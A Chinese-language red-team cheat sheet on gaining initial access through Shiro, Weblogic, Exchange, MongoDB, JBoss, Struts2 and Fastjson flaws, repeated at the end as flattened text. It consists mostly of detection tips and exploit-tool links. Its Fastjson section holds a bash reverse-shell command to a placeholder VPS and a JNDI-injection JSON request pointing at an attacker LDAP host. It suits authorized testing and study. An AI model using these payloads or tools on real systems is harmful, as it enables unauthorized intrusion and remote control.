红蓝对抗外网打点技巧总结
字数 1173 2025-08-11 17:40:10

红蓝对抗外网打点技巧总结

1. Shiro反序列化漏洞利用

检测方法

  1. 常规检测

    • 通过登录框、页面或Wappalyzer确定目标使用Java语言
    • 使用shiro_tool.jar检测是否为Shiro框架:
      java -jar shiro_tool.jar https://xxx.com/xx/ keys=/xxx/shiro_keys.txt
      
  2. BurpSuite被动扫描

    • 使用BurpShiroPassiveScan插件进行被动扫描
    • GitHub地址:https://github.com/pmiaowu/BurpShiroPassiveScan

利用方法

  1. 使用大量key字典跑出正确的key
  2. 使用ShiroExploit-v2.3.jar执行命令或写入内存马

注意事项

  • 登录框可能不存在,但跳转后的POST接口可能存在认证
  • 建议尝试登录后抓包分析

2. Weblogic反序列化漏洞

常见端口

  • 7001
  • 7002

利用工具

  1. WeblogicScan:
    • https://github.com/rabbitmask/WeblogicScan
  2. weblogicScanner:
    • https://github.com/0xn0ne/weblogicScanner
  3. 图形化工具:
    • weblogic_exploit-1.0-SNAPSHOT-all.jar

3. Exchange RCE漏洞

利用工具

  • Exchange SSRF RCE工具:
    • https://github.com/jeningogo/exchange-ssrf-rce

4. MongoDB未授权访问

检测工具

  • DBScanner:
    • https://github.com/se55i0n/DBScanner
    • 可扫描多种数据库的未授权访问漏洞

5. JBoss RCE漏洞

参考资源

  • Java反序列化漏洞利用:
    • https://github.com/joaomatosf/JavaDeserH2HC

JBoss 5.x/6.x反序列化漏洞(CVE-2017-12149)

  1. 检测方法:
    • 访问/invoker/readonly
    • 返回500说明页面存在,存在反序列化漏洞

6. Struct2漏洞

利用工具

  • STS2G:
    • https://github.com/x51/STS2G

7. Fastjson反序列化漏洞

利用工具

  • fastjson_rce_tool:
    • https://github.com/wyzxxz/fastjson_rce_tool

利用方法

  1. 启动LDAP服务器:

    nc -lvp 4444
    java -cp fastjson_tool.jar fastjson.HLDAPServer your_vps_ip port "bash=/bin/bash -i >& /dev/tcp/your_vps_ip/4444 0>&1"
    
  2. 发送恶意请求:

    POST / HTTP/1.1
    Host: 192.168.255.132:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 193
    
    {
      "e":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
      },
      "f":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.255.135:8888/Object",
        "autoCommit":true
      }
    }
    

总结

本文档总结了红蓝对抗中常见漏洞的检测和利用方法,包括:

  • Shiro反序列化
  • Weblogic反序列化
  • Exchange RCE
  • MongoDB未授权访问
  • JBoss RCE
  • Struct2漏洞
  • Fastjson反序列化

每个漏洞都提供了相应的检测工具和利用方法,实际使用时请确保在合法授权范围内进行测试。

红蓝对抗外网打点技巧总结 1. Shiro反序列化漏洞利用 检测方法 常规检测 : 通过登录框、页面或Wappalyzer确定目标使用Java语言 使用shiro_ tool.jar检测是否为Shiro框架: BurpSuite被动扫描 : 使用BurpShiroPassiveScan插件进行被动扫描 GitHub地址:https://github.com/pmiaowu/BurpShiroPassiveScan 利用方法 使用大量key字典跑出正确的key 使用ShiroExploit-v2.3.jar执行命令或写入内存马 注意事项 登录框可能不存在,但跳转后的POST接口可能存在认证 建议尝试登录后抓包分析 2. Weblogic反序列化漏洞 常见端口 7001 7002 利用工具 WeblogicScan: https://github.com/rabbitmask/WeblogicScan weblogicScanner: https://github.com/0xn0ne/weblogicScanner 图形化工具: weblogic_ exploit-1.0-SNAPSHOT-all.jar 3. Exchange RCE漏洞 利用工具 Exchange SSRF RCE工具: https://github.com/jeningogo/exchange-ssrf-rce 4. MongoDB未授权访问 检测工具 DBScanner: https://github.com/se55i0n/DBScanner 可扫描多种数据库的未授权访问漏洞 5. JBoss RCE漏洞 参考资源 Java反序列化漏洞利用: https://github.com/joaomatosf/JavaDeserH2HC JBoss 5.x/6.x反序列化漏洞(CVE-2017-12149) 检测方法: 访问 /invoker/readonly 返回500说明页面存在,存在反序列化漏洞 6. Struct2漏洞 利用工具 STS2G: https://github.com/x51/STS2G 7. Fastjson反序列化漏洞 利用工具 fastjson_ rce_ tool: https://github.com/wyzxxz/fastjson_ rce_ tool 利用方法 启动LDAP服务器: 发送恶意请求: 总结 本文档总结了红蓝对抗中常见漏洞的检测和利用方法,包括: Shiro反序列化 Weblogic反序列化 Exchange RCE MongoDB未授权访问 JBoss RCE Struct2漏洞 Fastjson反序列化 每个漏洞都提供了相应的检测工具和利用方法,实际使用时请确保在合法授权范围内进行测试。